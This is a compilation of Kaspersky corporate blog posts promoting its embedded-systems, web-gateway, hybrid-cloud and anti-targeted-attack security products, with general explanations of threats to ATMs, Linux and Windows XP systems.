Features of embedded systems

Usage model. Unlike a conventional computer, which is typically used by a single employee for a wide range of tasks, an embedded system can have an unlimited number of users, and usually provides a meager set of functions built into the system during its initial creation. Interaction with such systems is often carried out using specific input devices (such as a digital keypad or a touch screen with a narrowly specialized user interface) that do not permit the execution of arbitrary commands and files. Ports for connecting external peripherals to these devices are usually accessible only to technical specialists. Communication with the outside world takes place through the internet and local network; in addition, embedded systems are often used with functionally-limited storage devices such as banking, savings or discount cards. Such systems should in no way be used for reading emails or visiting websites — that way attackers cannot rely on these vectors for infection. However, the significance of network connections is increased. And this is one of the main channels used for attacks on embedded systems; after all, almost all types of embedded systems have a connection to the company’s local network — meaning that once inside this network, attackers can reach these specialized machines. As for ports, the specific physical location of such devices can help a hacker.

Physical location. To facilitate the usage model, the vast majority of devices based on embedded systems are located in public spaces. Typically, device components are protected from unauthorized access by a sturdy steel casing and interaction restrictions. However, all devices require some degree of maintenance, so even those with the most robust encasing need to be openable with a key. And this is where attackers can enter. Having gained access to the hardware part of the device, they can connect a standard mouse and keyboard, a storage device with the malware they want to use, or even an operating system that can allow them to bypass the hacked device’s own OS. In some cases, attackers even connect a single-board computer with which they can hack the system or, for example, analyze commands that make the dispenser issue banknotes to the user. The rest is pretty straightforward: the hacker just needs to introduce their tools into the embedded system and then they can make it do whatever they want — from dispensing money or conducting shadow transactions to stealing user data. Unless, of course, the embedded system is properly protected.

Long-term use and limited system resources. Embedded systems are built for specific, highly specialized tasks, so they usually have only the “necessary and sufficient” level of processing power. Since devices using embedded computer systems often have a long service life, it’s not uncommon to encounter functioning ATMs or cash registers with weak, outdated hardware. From a security standpoint, this can pose a significant problem: such a configuration is clearly not compatible with many of the latest security solutions.

Outdated, vulnerable software. The long life of expensive devices based on embedded systems generates another side effect: outdated software. Often, it’s simply impossible to use a newer OS on a modest system configuration, and current specialized application software may not work on the old OS. And sometimes, the new programs necessary for working with the unique peripherals of the device (cash dispensers, card readers, medical monitoring systems, tomographs, and so on) may simply not exist. The consequence of this is that such systems for which security updates are no longer released are actively targeted by hackers. But finding a solution that will work on an old OS, such as Windows XP, and at the same time protect against current threats is extremely challenging; the vast majority of security product developers have discontinued their support for legacy operating systems.

Weak internet connection. Some devices, such as ATMs, ticket terminals and automatic fuel dispensers, may be located in remote places where there’s no wired internet. Also, wireless network access in such places is usually based on cellular communication, so it may work slowly and with interruptions. Application software is designed for such a scenario; for example, transactions can be serviced asynchronously by a bank — they are performed when the connection allows it. However, many modern security solutions are much more reliant on a stable communication channel. In an effort to reduce deployment time and the size of installed software, they rely heavily upon cloud infrastructure, which means that if the connection is poor their performance may be impacted.

Regulatory requirements. Since the vast majority of embedded systems handle valuable financial and personal data, their operation is regulated by relevant legislation. Though regulatory bodies mandate the presence of reliable protection, its implementation is largely left up to companies; however, the task is to minimize the risks of an incident occurring while ensuring that detailed logs are recorded for investigation if an incident does occur. Moreover, the list of recommendations may include certain technologies, such as system integrity control, which are simply unavailable in typical endpoint security solutions, or are provided only in server versions.

Seeking a compromise

Summing up, these systems are multi-user, single-task, low-power, and susceptible to specific attack vectors (network connection and/or direct device access). At the same time, they handle extremely valuable data (not necessarily financial data; it could be personal medical information in the case of medical equipment), for which not only confidentiality is important, but also integrity. There may be a number of difficulties regarding the data’s protection, as a typical endpoint security solution will face problems working on weak hardware, and generally won’t work on outdated operating systems, which are still quite common. If such a solution does run, there may be performance issues, and sometimes compatibility issues too (after all, the solution is intended for regular computers).

One of the approaches that many manufacturers of security solutions for such systems have taken is to completely prohibit anything that’s not needed for the device’s main task: application control technology in default-deny mode simply blocks any programs not initially included in the so-called allowlist. In theory, this means you don’t need any threat detection mechanisms; a virus simply won’t run, nor will any other unnecessary program, and such technology requires very few resources — allowing the solution to work even on very weak systems.

However, this approach may be powerless against, for example, code injection into a legal, already running process in memory — which can be achieved through exploiting those same vulnerabilities in outdated software. Techniques developed by hackers to exploit elements of the system itself for malicious purposes often mean that the use of actual malware is reduced to a minimum. Yes, there are also fewer options available to hackers in a weak system, but… a business dependent on embedded systems, such as a bank or retail network, is unlikely to use only devices belonging to just one generation. This gives hackers some room to maneuver. What to do? Should you install different solutions — products based on the default-deny principle on weak systems, and a regular antivirus for workstations on more powerful machines, hoping to avoid compatibility issues? Or try to find a truly universal solution?

Special protection for special devices

If you look at the current security solutions for embedded systems on the market, most vendors offer two options:

• An “economical” resource-efficient solution that can work on outdated systems but offers simple single-layer protection based on application control technology and default-deny mode. This option usually lacks the means to resist the full range of typical attacks on embedded systems, and is often managed separately from other products in the vendor’s ecosystem, creating additional challenges.
• A typical endpoint security solution. For newer systems, most manufacturers suggest installing the same solution that protects regular workstations. Undoubtedly, such solutions have an up-to-date stack of security technologies and can be integrated into the vendor’s ecosystem. However, they usually lack certain technologies specifically required for protecting embedded systems. Also, such solutions only work on the latest and most powerful devices, leaving behind still functional but outdated ones.

Even if both options are used simultaneously, the full range of problems cannot be addressed. Moreover, inconsistent management approaches can make the work of IT and security admins much more complicated (especially if solutions from different manufacturers are used).

Based on all this, let’s try to imagine the ideal security solution suitable for a wide range of embedded systems and their use scenarios:

• The solution should provide the maximum possible level of protection. In today’s world, this means having a stack of various technologies to protect against the range of attack vectors and techniques typically used on embedded systems of all types.
• The solution should provide maximum protection to systems with different capabilities — both old, low-spec ones, and the newer ones with plenty of computing power and memory. However, since it’s simply impossible to physically run every technology simultaneously on weak hardware, scalability is required. In other words, the solution should allow separate management of protection layers so you can disable unnecessary tools and activate those which provide maximum protection for a specific hardware and use scenario.
• The solution should support the most popular operating systems used to create embedded systems; that is — at least Windows and Linux.
• The solution should support outdated OS versions used on embedded systems that are still in operation.
• The solution should meet regulatory requirements, have recommended technologies in its security stack, and be able to perform detailed event logging in a centralized security event monitoring system (SIEM).
• The solution should be thoroughly tested for compatibility — at least with typical configurations of different types of embedded systems. Ideally, it should be supplied as part of a software/hardware system all components of which have been tested for compatibility by the manufacturer.
• The solution should have centralized management — ideally unified with other products in the vendor’s ecosystem to create a comprehensive security system providing monitoring and protection of all levels of the company’s IT infrastructure through a single console.

Kaspersky Embedded Systems Security

Many years ago, before fully understanding what a specialized solution for protecting embedded systems should look like, Kaspersky also attempted to use applications from the Kaspersky Security for Business product line for this task. However, it soon became clear that using a conventional application for the entire range of embedded systems was simply impossible. Therefore, the decision was made to develop a separate solution that could meet the ideal requirements to the maximum extent. The result was the emergence of Kaspersky Embedded Systems Security — initially supporting Windows and later Linux as well.

Our solution offers an exceptionally rare combination in the global market: a multi-layered technological stack for different platforms, very modest system resource requirements, and support for outdated OS versions (down to Windows XP SP2). At the same time, it’s part of Kaspersky’s rich security ecosystem. All of this means that Kaspersky Embedded Systems Security comes very close to the ideal solution that we describe above. You can familiarize yourself with the main features of the product on its webpage; for technical details, you can visit the Kaspersky support site sections dedicated to the product’s applications for Windows and/or Linux.

Among IT experts (including cybersecurity gurus) the opinion still lingers that Linux is virus-free, that the system is secure by design and so, therefore additional protection is not required. Twenty years ago, sure. But these days that’s a dangerous misconception. Here’s why.

Linux malware: the real state of affairs

Back in the days when Linux was a hobby-horse for enthusiasts and an operating system for servers, cybercriminals did indeed largely ignore it. But with the rising popularity of Linux systems, including OS’s for embedded devices, this situation has changed drastically. Aware that more and more banks, medical institutions, retailers and other large companies are starting to use Linux-based embedded solutions, cybercriminals have been exploring ways to attack them. For example, a pretty potent piece of Linux malware used in attacks on the Latin American financial sector made the news just last year.

APT attacks on Linux systems

Another scenario is when attackers leverage Linux based systems as a foothold into a corporate perimeter – the IT team might not think to protect the information kiosk, which contains no data of value. However, cybercriminals often need a way inside the corporate perimeter, in order to launch an APT attack and an unprotected embedded device is just the ticket. A payment terminal installed in a place available to public or a cash register with an internet connection in a supermarket hall may well serve as an entry point for a sophisticated attack.

Specialized security solutions

Additionally, some specialists don’t rush to protect Linux-based embedded systems because they don’t trust the capabilities of security solutions – sometimes, they think that some of their features are simply of no use to embedded devices. Why would an ATM need anti-phishing protection, for example, if nobody will open web-sites or access e-mail there? . On the other hand, there are usually no guarantees that basic security solutions for Linux can handle the specifics of embedded devices.

With the release of the specialized application, Kaspersky Embedded Systems Security for Linux, as part of our Kaspersky Embedded Systems Security solution, we aim to address this very issue. It is designed, optimized and tested specifically for Linux-based embedded devices. It guarantees safe device operation, without burdening the OS with unnecessary processes. At the same time, the application can be integrated with SIEM systems and managed both through the command line and from a single unified management console, along with other Kaspersky solutions. You can learn more about Kaspersky Embedded Systems Security here.

Why a Windows XP source code leak is bad news

Microsoft discontinued support for Windows XP way back in 2014, so anyone still using it in 2020 is taking a big risk; Microsoft will never patch the new vulnerabilities that continue to pop up. The company makes one exception: critical bugs that can lead to global incidents. For example, the company determined that the CVE-2017-0144 (exploited by WannaCry) and CVE-2019-0708 vulnerabilities posed such a threat. Less high-profile vulnerabilities can also have very nasty consequences, however.

Leaked source code aggravates the situation by giving potential attackers the opportunity to study the operating system in depth, which likely means more exploitation attempts in the near future. Security experts are not at all certain to keep on top of all of the vulnerabilities cybercriminals discover.

What’s more, the vast majority of modern security solutions run only under current operating systems. That’s largely because the difference between Windows 10 and Windows XP, as well as among the technical specifications of the devices on which they run, is too great for one solution to effectively protect both operating systems.

We are also ending support for the outdated versions of our main solution that can still be used to protect Windows XP, which means companies that can’t or won’t upgrade their operating systems will have to look for alternative means of protection.

Security solution for legacy systems

A source code leak is a sound reason to review all corporate systems and, where possible, upgrade devices from Windows XP to at least Windows 7. However, not all companies can get rid of an outdated operating system just like that. Some require it for compatibility with critical hardware or software; others might simply lack the cash to upgrade everything that needs it.

Fortunately, we have a solution for keeping legacy systems secure: Kaspersky Embedded Systems Security. We initially created it to protect devices, such as ATMs and POS terminals, running Windows Embedded operating systems (including ones based on Windows XP), but the solution protects ordinary computers running XP equally well. As with our flagship technologies for businesses, you can manage Kaspersky Embedded Systems Security centrally from Kaspersky Security Center.

Tips for securing Windows XP devices

If your company’s computer fleet still harbors machines running Windows XP, don’t opt for just any antivirus solution; you need an integrated security approach.

• Use the latest versions of software that are compatible with the operating system. For example, Chrome has not supported Windows XP since 2016, or Firefox since 2018. All else being equal, the latter is the better choice;
• Remove all unnecessary programs — or, better, use Application Control technology to cull the list of processes allowed to run on outdated computers. The set of tasks handled by such devices is usually small, and having an “allow” list of runnable programs greatly complicates matters for cybercriminals;
• Disconnect old devices from the Internet where possible. Where access is critical, use the most modern of the available browsers;
• Use a Web gateway to filter external traffic and block unwanted requests from the outside. For that, look no further than Kaspersky Security for Internet Gateways.

These scenarios tend to involve the traditional weakest link, employees. We repeatedly encounter incidents caused by someone disabling a security solution component. When asked why, they typically respond that they found the advice online or thought it wasn’t needed, or even that it was interfering with work. Malware penetration of company infrastructure is often the result of personal devices connecting to the corporate network. And there is always phishing — cybercriminals can trick employees into entering corporate data on a fake website.

It’s most commonly small companies that face such problems because smaller businesses are less likely to devote the resources to regularly train staff or to install and maintain complex solutions that can impose tough restrictions.

The latest update of Kaspersky Web Traffic Security, which appeared late last year, addressed this issue. The solution can now be installed not only in concert with a proxy server that is already part of your infrastructure, but also deployed as a ready-made proxy server with integrated protection. The second option, which can be implemented either as a virtual appliance or as a hardware-based solution, minimizes the cost of deploying and maintaining the Web traffic security system.

Such solutions are usually associated with complex manipulations requiring serious Linux administration skills, but the new version of Kaspersky Web Traffic Security is designed in a way that it can be installed and configured without any knowledge of Linux at all. General network administration skills are enough; configuration wizards and convenient control console menus help with the rest.

What can Kaspersky Web Traffic Security do?

The application allows you to filter traffic at the Internet gateway level — that is, at the entrance and exit of your corporate network. Kaspersky Web Traffic Security:

• Stops most mass threats before they even reach workstations.
• Automatically blocks not just malicious, but also phishing Web resources, simply by preventing employees from slipping up.
• Saves system administrators’ time and worry — there is no need to trawl through alerts on every computer on the network.

Flexible configuration

The updated Kaspersky Web Traffic Security lets you create independent configurations for different networks and manage them from a single console. This is handy for companies that have branches with particular security requirements, as well as for MSPs and other providers that offer cybersecurity services to customers.

Moreover, Kaspersky Web Traffic Security does not conflict with other security solutions for gateways, so even if you use another solution for basic protection, you can add it for maximum security.

Learn more and talk to our experts on the Kaspersky Web Traffic Security page.

Cybercriminals have long been using the Web for all kinds of attacks — and we don’t just mean phishing pages that steal users’ credentials for online services, or malicious sites that exploit browser vulnerabilities. Advanced attacks aimed at specific targets also use Web threats.

Web threats in targeted attacks

In Securelist’s 2019 APT review, our experts give an example of an APT attack that uses the watering-hole method. In the attack, cybercriminals compromised the website of India’s Centre for Land Warfare Studies (CLAWS), and used it to host a malicious document that distributed a Trojan to gain remote access to the system.

A couple of years ago, another group launched a supply-chain attack, compromising the compilation environment of the developer of a popular application and embedding a malicious module into the product. The infected application, with its bona fide digital signature, was distributed on the developer’s official website for a month.

The above are not isolated cases of Web-threat mechanisms deployed in APT attacks. Cybercriminals are known to study the interests of employees and send them malicious links in messengers or social networks that look like websites likely to appeal to their tastes. Social engineering works wonders on trusting individuals.

Integrated protection

It became obvious to us that to improve protection against targeted attacks, we needed to consider Web threats in the context of other events on the corporate network. Therefore, Kaspersky Web Traffic Security 6.1, released in the run-up to the new year, is integrable with the Kaspersky Anti-Targeted Attack platform. Operating in tandem, they complement each other, beefing up the network’s overall defenses.

It is now possible to set up bidirectional communication between the solution protecting the Web gateway and the solution guarding against targeted threats. First, that lets the gateway-based application send suspicious content for in-depth dynamic analysis. Second, Kaspersky Anti-Targeted Attack also now has an additional source of information from the gateway, enabling the earlier detection of the file components of a complex attack and blocking of malware’s communication with C&C servers, thereby disrupting the targeted attack scenario.

Ideally, integrated protection can be implemented at all levels. This involves setting up a targeted threat defense platform to receive and analyze data from workstations and physical or virtual servers, as well as the mail server. If a threat is detected, the results of its analysis can be forwarded to Kaspersky Web Traffic Security and used to automatically block similar objects (and attempts by them to communicate with the C&C servers) at the gateway level.

See the Kaspersky Web Traffic Security page for more information about our gateway protection application.

There are several reasons to do so, but topping the list, Internet gateway protection surpasses the human factor. Modern cybercriminals’ number one technique is social engineering. They use tricks to persuade users to open suspicious links, download malicious files, and even switch off protective systems. Therefore, the less malware that reaches your endpoints, the more secure your network will be.

So, the most logical way to start protecting your network from malicious files and harmful websites is really to implement a security solution that stands at the gates through which data enters your infrastructure: at the level of the Internet gateway, using a proxy server as an integration point.

As you may already suspect, we have our own solution that works exactly that way.. It is Kaspersky Security for Internet Gateways, with its core application, Kaspersky Web Traffic Security. In addition to severely lowering risks of human error, our application:

• Can block 95% of modern malware thanks to its combination of machine learning­–based algorithms and emulative sandboxing;
• Benefits from global threat intelligence coming from Kaspersky Security Network, which allows it to react to the newest malware as soon as it’s discovered;
• Allows you to control and secure SSL-encrypted corporate Web traffic;
• Blocks malicious and phishing websites;
• Reduces risk of infection and data leaks by using content filtering capabilities;
• Restricts access to specified categories of Web resources by implementing Web control scenarios.

Even if your gateway already has similar solutions installed, it is worth trying ours as an additional level of protection that can boost detection rate without adding any false positives. Now is the perfect time to try it: The all-new Kaspersky Web Traffic Security is now in its final prerelease stages, giving you a unique chance to participate in its public beta testing program.

What GDPR is, and how it will help

GDPR suggests an ongoing process focused on ensuring that data subjects have real control over their personally identifiable information — and ensuring companies use it lawfully and handle it securely. It helps give both data controllers and data processors a clearer understanding of their responsibilities.

This regulation is about ensuring that the processes and technologies used for personal data safekeeping follow the Regulation and are effectively implemented. Therefore, compliance is not a one-time task, something that is simply accomplished; you will need to assess and adjust regularly. Compliance lies not just in following the letter of the law but also in taking a practical approach to ensuring data security — which you can accomplish by continuously tuning your processes and countermeasures.

What you can do

Of course, implementing effective cybersecurity technologies does not equal GDPR compliance. However, cybersecurity is among the cornerstones on which this compliance is built. We have some practical advice on how to strengthen it.

• Start your protection with endpoints (including keeping track of mobile ones); they are likely points of entry for cybercriminals, which can pose a risk even if the endpoints are not directly involved in personal data processing.
• Use encryption to protect data at rest — and in motion! Ensure the security of your regulated data storage.
• Add layers of protection to your gateway and e-mail server to counter the “human factor” to reduce risk.
• Regularly check your infrastructure for weaknesses before someone else has a chance to find them. Perform penetration tests and security assessments.
• Know what is happening in your infrastructure. In the event of a breach, your ability to establish the cause may help mitigate other, future risks and demonstrate that you made reasonable efforts to protect data.

We have a broad arsenal of measures that will help reduce the risks of a data breach, prevent security incidents, and deliver enhanced visibility of monitored infrastructure. They can be quite helpful in the quest for protection of personal data. Want to learn more? Please visit the GDPR section of our website.

The scenarios are infinite, and flexibility is key. For example, at one moment it might be more convenient to move some of your infrastructure to the cloud, whether for financial reasons or because divisions from multiple countries need access to it. And then, perhaps, you need to outsource a task, which means either giving an outsider access to your network (an added security risk) or launching a working environment in a public cloud, which adds another unknown quantity to your complex infrastructure equation. Not to mention the everyday elements you must juggle: all of the local workstations, and perhaps some virtualized workspaces.

Having a diverse local infrastructure plus your private cloud plus a public cloud — be it Amazon Web Services or Windows Azure — results in a very, very complex cybersecurity system that is often built from multiple, loosely connected parts. Complex systems are hard to administer, and they are more prone to having maintenance, and security issues.

At some point, you might dream of leaving all the legacy parts behind and implementing a new security solution that is capable of handling your diverse infrastructure. But that’s not always possible — often because of that very diversity. And public cloud systems have their own rules (no physical access to hardware or to hypervisors) only adds limitations.

To address this problem, we developed Kaspersky Hybrid Cloud Security, which can handle very diverse infrastructures. It helps administrators protect hybrid cloud infrastructures (the infrastructure you have in your own cloud and in public cloud services, such as AWS or Azure) and provide monitoring and administration through a single console. No matter where your servers are — on your premises, in a third-party data center, or in the private cloud — you will always have total control over their security measures without the need to implement different security solutions for each part.

Kaspersky Hybrid Cloud Security lets you protect servers running Windows Server or Linux OS as well as virtual desktop infrastructure, and it is compatible with the most popular public clouds (Microsoft Azure and Amazon Web Services). In terms of administration of the infrastructure, its best feature is that it is fully compatible with the very same Kaspersky Security Center console that also enables you to administer other Kaspersky Lab security solutions installed on physical workstations, servers, and mobile devices. That makes administration a significantly easier task and strengthens the security of your infrastructure, with its uniformity leaving less room for mistakes.

Kaspersky Hybrid Cloud Security was presented today at the RSA conference. It can be implemented either in a large corporate infrastructure or in the network of a small company. To learn more about this solution and understand the benefits it can bring to your business, please visit our corporate site using the links above.

Why do we think this approach makes the most sense? Whatever you might think of it, we are participating in an never-ending arms race. By continuously improving protection technologies, we try to make them more effective than the tools and techniques used for cybercriminal activity. But what matters is that we cannot settle for purely reactive measures. To efficiently deflect various attacks, we need flexibility to optimize protection not reactively, but proactively, before new threats are out.

Moreover, we think that a single super-technology that guarantees protection from all threats is a utopian dream. Even a new method demonstrating proven impressive results shortly after its conception will be effective only until cybercriminals strike back.

Effective protection framework is cyclical

We think the most viable security architecture is the one described by Gartner. It is based on a cycle of activities and divided into four key areas: Prevent, Detect, Respond, and Predict. Essentially, it assumes intrusion detection and prevention systems should function in concert with threat analytics. Ideally, this strategy helps to create a cybersecurity system that continuously adapts and responds to the emerging challenges of the digital world.

Here is how this adaptive security model could be deployed.

Prevent

The “Prevent” segment is, to put it simply, technologies which use iron-clad reasoning to define whether an object is safe or malicious and block in the latter case. This segment includes such solutions as firewalls, signature-based engines, and proactive technologies using machine learning. They are all, in essence, included in all of our products for Next Gen endpoint protection: Kaspersky Security for Business, Kaspersky Security for Virtualization, and others.

These solutions don’t need to be managed by a security expert. Most frequently, such systems are managed by general-purpose IT administrators who can also take care of things like databases or local networks. They need a security solution to be robust and hassle-free.

Such products block up to 99% of threats, blocking not only well-known (70%) but also previously unknown (29%) malware. But what about the remaining 1% of advanced threats, which are the most tricky and dangerous? Especially with that 1% inflicting heaviest damage on attacked businesses?

Detect

Some objects and events can be classified as inherently malicious, and some could be inherently safe. However, such classification is not always enough. Some of them are in the gray zone — for example, advanced threats such as APTs, which go to great lengths to evade or mislead security systems.

To control the gray zone, we need the “Detect” level. Security solutions belonging to this layer do not block threats themselves. They serve to detect and report suspicious activity.  Such solutions should be managed not by IT generalists, but by skilled infosec professionals.

“Detect” technologies include behavioral analytic systems and dynamic code analyzers. An example of such technologies is the recently launched Kaspersky Anti-Targeted Attack Platform. Among its features, it boasts the Targeted Attack Analyzer, which controls network events. It is based on an approach we call HuMachine Intelligence: a seamless fusion of Big Data-based Threat Intelligence, Machine Learning and Human Expertise. It is highly effective because human and machine intelligence work better when they complement each other, rather than work separately and benefit from most relevant globally acquired knowledge of the threat landscape. The Targeted Attack Analyzer detects suspicious activity by analyzing the system’s working patterns and comparing them to ‘normal’ picture . If any activity does not match the usual state of things, the system alerts personnel. The normal model is created with the help of machine-learning processes functioning both on Kaspersky Lab servers and on customer’s premise. Thus, the system knows what is normal and what is not in certain environment.

As an example, let’s look at a medium-size company that works in the sphere of trade. It does not conduct business with, say, Vietnam. None of the employees are Vietnamese. And one day a computer in the enterprise network connects to a .vn Web resource in the dead of night. The Targeted Attack Analyzer knows that no one from within the organization has ever visited Vietnamese websites. Also, according to the Kaspersky Security Network, no one has ever connected to that server. Therefore, the .vn connection is a reason to employ some deep analysis tools. Of course, it could be entirely innocent and coincidental, but it is abnormal, so it makes sense to double-check the incident.

Respond

“Respond” is the next logical step in this framework. In our case, the threat can be neutralized with help of both technologies and services, and by the latter we mean work of analysts who investigate attacks and prepare reports.

Kaspersky Lab offers a wide range of these services, including incident research and malware analysis. In addition, we are working on a toolset to optimize these processes by automating evidence collection, searching for compromised endpoints, employing remote configuration, and more.

In the meantime, further development of Kaspersky Anti Targeted Attack platform involves introduction of Endpoint Detection and Response capabilities, which would not only greatly enrich detection context, but also provide response functionality on the scale of the extensive enterprise network. Also, it provides forensic specialists with extended range of data crucial for subsequent incident investigation.

The collected data also helps us to better understand today’s cyberthreat landscape, thus creating more effective protection solutions. This is what the next level is all about.

Predict

Various data feeds, obtained through both automatic acquisition (data on malicious links and files) and by expert analysts (APT research), are indispensable assets that can be used to predict future attacks and attack vectors and thus improve security posture. This data, constantly fed into Kaspersky Lab internal analytical systems, is thoroughly assessed. The results of the analysis are used to improve security mechanisms, including adjustments to machine learning processes.

To improve our technologies, we also use data obtained during pentesting and application security analysis (see the “Prevent” section above). Having processed all available information, our technologies can automatically block more threats — which brings us back to the ‘Prevent’ level we started our article with.

And there you have it: the never-ending cycle of Adaptive Security Architecture. Ideally, it enables us to stay ahead of cybercriminals, creating and improving security systems according to the current state of the threat landscape and preventing huge losses for businesses.

It’s no secret that the threat landscape is constantly changing. However, the key trend here is the consolidation of the cybercriminal industry. We used to divide threats into conventional (having only a moderate impact but still annoying) and professional cybercrime, and APTs (advanced persistent threats, a token contingent of government-sponsored hacker groups). But now, these lines are getting very blurred. Professional cybercrime gangs, motivated mainly by profit, on the one hand are increasingly prone to using conventional methods and on the other hand frequently act as mercenaries, serving the interests of various groups (which sometimes are governments). This has a dual impact on the cybersecurity environment. First, advanced attacks are increasingly becoming massive, and second, it makes attribution even more challenging. In turn, complex and “high-end” APT attacks are replaced by just “targeted attacks,” which do not rely so much on persistence and can use old — but still effective — Trojans and even legitimate tools.

However, let’s get a detailed view on the methods cybercrooks use increasingly often in targeted attacks.

Exploits

Practically every single targeted attack relies on exploits. Until recently, those were zero-day exploits —vulnerabilities as yet unpublished. Of course, such exploits are still menacing, but zero-day attacks are now rare. Now, major disaster is caused by so-called one-day vulnerabilities — exploits that have been already found and, what’s worse, published. Even if developers have issued patches, the time it takes to apply patches to the affected systems is enough for cybercriminals to attacks thousands of victims. Moreover, there are “any-day” vulnerabilities; a staggering number of systems remain unpatched for years.

A number of methods exist to battle this disease, but we think True Cybersecurity can be achieved through a combination of technology levels. First, patching should be fully automated. No doubt, patching is a complex and difficult task administrators have trouble keeping up with. But patching alone is not enough. It’s necessary to make sure exploits are harmless before patching. Fortunately, fewer exploit techniques exist than actual exploits. So, our security toolset includes several methods to protect critical processes against exploitation. We prefer noninvasive methods based on behavioral analytics, which can detect activity related to exploits and don’t require deep inspection of processes.

Fileless malware

Another problem that is gaining increasing prominence is fileless malware. It cannot be detected by scanning a hard drive, and as soon as it completes its tasks, it disappears, leaving no traces to aid investigation.

However, we know how to fight that type of threat. To detect threats that operate in system memory, we have to work on a number of levels. First, we have to keep an eye on memory activity and kill any processes that are not normally used by legitimate software. However, for that method to be effective, the technology that keeps track of memory processes needs access to additional data such as URL reputation and a control center white list. Machine-learning technologies are also required: to process and streamline this information, and to assess new process-related behavioral data. This approach makes detection more effective, regardless of any tricks a cybercriminal might pull.

Legitimate tools

Strange as it may seem, legitimate programs, in particular code interpreters, have become a threat. When malware uses legitimate tools to launch, attacks become quite hard to detect. The processes associated with installers are usually viewed as trusted, even if they perform malicious instructions. Such programs are also frequently cross-platform, which means a threat can have even more impact.

One of the most dangerous tools of this kind is PowerShell. PowerShell scripts are, well, very powerful. PowerShell-based malware can do many things: download more malware, remotely execute code, and run exploits — even fileless Trojans — for example. It’s no wonder cybercriminals have been using PowerShell lately.

To protect against the threat of legitimate tools being used maliciously, we recommend getting rid of unnecessary code interpreters installed in your system or using application control to block them. Also, use proven security solutions that rely on a multilevel approach and next gen methods of behavioral analysis that uncover both suspicious activity and methods of running scripts and their sources.

Of course, these are not the only methods cybercriminals tend to use in targeted attacks. Our experts think that true cybersecurity within an organization requires the use of an adaptive cybersecurity model. Such a model presupposes the use of systems that constantly adapt to the ever-changing threat landscape. In general, we recommend that you:

• Protect all endpoints with the help of a multilevel IPS system;
• Deploy solutions to fight unknown threats across the infrastructure;
• Make sure employees are ready to respond to threats and have access to an effective toolset, including access to outside experts;
• Regularly audit infrastructure and application security with help of outside researchers and use additional sources of threat analytics to predict the next attack vector;
• Nurture employee awareness about the latest cyberthreats.

Having these processes deployed and streamlined across the entire organization will help protect it against any cyberattack, targeted or not.